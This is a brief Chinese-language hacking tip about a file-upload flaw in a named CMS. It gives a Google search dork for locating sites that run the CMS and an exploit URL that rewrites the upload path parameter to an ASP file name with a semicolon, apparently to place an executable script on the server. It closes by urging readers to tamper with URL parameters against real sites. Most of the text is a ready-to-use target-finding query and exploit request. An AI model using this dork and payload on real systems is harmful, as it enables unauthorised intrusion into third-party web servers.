大家可能都看见过这样的漏洞,这里以疯子的嘉友科技cms上传漏洞为例。
谷歌关键字:inurl:newslist.asp?NodeCode=
exp:
admin/uploadfile.asp?uppath=mad.asp;upname=;uptext=form1.mad.asp
他原上传目录是:/uploadfile.asp?uppath=PicPath;upname=;uptext=form1.PicPath
可以看出对参数PicPath进行了修改,
这种漏洞主要是存在文件名或者路径过滤不严,在实战中多多观察url中的参数,可以尝试进行修改数据。
